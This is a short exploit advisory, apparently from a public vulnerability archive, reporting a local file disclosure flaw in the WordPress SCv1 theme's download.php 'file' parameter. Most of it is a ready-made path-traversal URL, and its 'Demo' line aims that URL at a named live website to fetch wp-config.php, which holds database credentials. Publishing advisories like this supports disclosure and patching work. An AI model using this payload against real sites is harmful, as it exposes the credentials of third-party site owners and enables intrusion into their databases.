WordPress SCv1 theme suffers from a file disclosure vulnerability. Note that this finding houses site-specific data.
2e93c64b312f97c111675434e17d000dca89e84f10422112287ab469ee1273b2
[+] Title : Wordpress SCv1 Theme Local File Disclosure
[+] Discovered By : Medrik
[+] CMS Home-Page : http://wordpress.org
[+] Found Date : 2014-06-10
[+] Tested On : Windows
This is LFD Vulnerability In :
File : download.php
Parameter : file
Vulnerability (Locate) :
http://Vulnerable_Host/wp-content/themes/SCv1/download.php?file=[LFD]
Demo :
http://susannahcahalan.com/wp-content/themes/SCv1/download.php?file=../../../../wp-config.php
Spc Tnx : Beni_Vanda , Black_KinG , M.R.S.CO , Dr.3v1l , 8ThBiT